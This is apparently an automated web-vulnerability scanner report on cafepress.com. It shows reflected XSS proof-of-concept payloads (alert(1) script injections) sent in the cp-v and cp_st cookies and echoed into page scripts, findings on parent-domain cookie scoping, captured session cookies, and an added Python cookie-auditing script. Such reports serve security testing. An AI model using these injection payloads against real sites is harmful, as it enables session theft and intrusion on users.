Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 174586
Date: Sun, 26 Dec 2010 13:49:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 174586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /sk/TheGamingApe

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 622eb</script><script>alert(1)</script>7a1f01045b0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=622eb</script><script>alert(1)</script>7a1f01045b0; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 174630
Date: Sun, 26 Dec 2010 13:49:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 174630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SKGallery'
window.cafepress.tealeaf.searchTerm = '622eb</script><script>alert(1)</script>7a1f01045b0'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_0
...[SNIP]...

2. Cookie scoped to parent domain
There are 70 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.cafepress.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 75158
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...

2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
Content-Length: 0
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private


2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
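As an added check, written for this edit and not part of the scanner report, of Burp Suite, or of the CafePress site, the following Python script reproduces the logic behind this finding: it parses a raw HTTP response, reports every Set-Cookie whose domain attribute is a parent of the issuing host (here domain=cafepress.com set by www.cafepress.com, so every host under cafepress.com can read or overwrite the cookie), flags cookie names that look like session tokens, and notes missing HttpOnly and Secure attributes. The session-name regular expression is a heuristic assumption, and the sample response is constructed from the headers shown in this section with values shortened. The same block covers the identical issue text in findings 2.3 through 2.11.

```python
"""Check Set-Cookie headers for parent-domain scoping and session-cookie flags.

Added example for this report (not Burp Suite's code and not CafePress code):
reproduces the logic behind the "cookie scoped to parent domain" finding.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Heuristic (assumption, not defined by the report): names that usually
# carry a session token.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


@dataclass
class CookieFinding:
    name: str
    domain: str | None
    parent_scoped: bool
    session_like: bool
    httponly: bool
    secure: bool
    notes: list[str] = field(default_factory=list)


def parse_set_cookie(header_value: str) -> tuple[str, dict[str, str | bool]]:
    """Split 'name=value; Domain=x; HttpOnly' into (name, {attr: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: dict[str, str | bool] = {}
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, value = part.split("=", 1)
            attrs[key.strip().lower()] = value.strip()
        else:  # flag attribute such as HttpOnly or Secure
            attrs[part.lower()] = True
    return name, attrs


def is_parent_domain(cookie_domain: str, host: str) -> bool:
    """True when the Domain attribute covers more hosts than the issuing one.

    A leading dot is ignored (RFC 6265 section 5.2.3): 'cafepress.com' is a
    parent of 'www.cafepress.com'; 'www.cafepress.com' itself is not.
    """
    domain = cookie_domain.lstrip(".").lower()
    host = host.lower()
    return domain != host and host.endswith("." + domain)


def audit_response(raw_response: str, host: str) -> list[CookieFinding]:
    """Return one CookieFinding per Set-Cookie header in a raw HTTP response."""
    header_block = raw_response.split("\r\n\r\n", 1)[0]
    findings: list[CookieFinding] = []
    for line in header_block.split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        name, attrs = parse_set_cookie(line.split(":", 1)[1])
        domain = attrs.get("domain")
        domain = domain if isinstance(domain, str) else None
        finding = CookieFinding(
            name=name,
            domain=domain,
            parent_scoped=domain is not None and is_parent_domain(domain, host),
            session_like=bool(SESSION_NAME_RE.search(name)),
            httponly=attrs.get("httponly") is True,
            secure=attrs.get("secure") is True,
        )
        if finding.parent_scoped:
            finding.notes.append(f"readable by every host under {domain}")
        if finding.session_like and not finding.httponly:
            finding.notes.append("session-like cookie without HttpOnly")
        if finding.session_like and not finding.secure:
            finding.notes.append("session-like cookie without Secure")
        findings.append(finding)
    return findings


# Constructed sample modelled on the responses in this section (values shortened).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/\r\n"
    "Set-Cookie: cppss=3x0; domain=cafepress.com; path=/\r\n"
    "Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/\r\n"
    "Set-Cookie: pref=1; path=/\r\n"
    "\r\n"
    "<html>...</html>"
)


def session_cookies_at_risk(raw_response: str = SAMPLE_RESPONSE,
                            host: str = "www.cafepress.com") -> list[str]:
    """Names of session-like cookies that are parent-scoped or lack HttpOnly."""
    return [f.name for f in audit_response(raw_response, host)
            if f.session_like and (f.parent_scoped or not f.httponly)]


if __name__ == "__main__":
    for f in audit_response(SAMPLE_RESPONSE, "www.cafepress.com"):
        print(f"{f.name:20} domain={f.domain!s:15} {'; '.join(f.notes) or 'ok'}")
```

Run against the responses captured in this section, the check flags ASP.NET_SessionId in every one of them: it is re-issued with domain=cafepress.com on each request, and only the response in 2.4 sets it with HttpOnly, while 2.3 and 2.5 onward set it again without that attribute. Because the page's main topic is reflected XSS, the practical consequence is that script injected on any host under cafepress.com can read a non-HttpOnly session cookie scoped to the parent domain, and can also plant its own cookies (cp_st, cp_sc and the rest) that www.cafepress.com will accept.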

Request

GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; 
__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
Cteonnt-Length: 118606
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:56:00 GMT
Connection: close
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
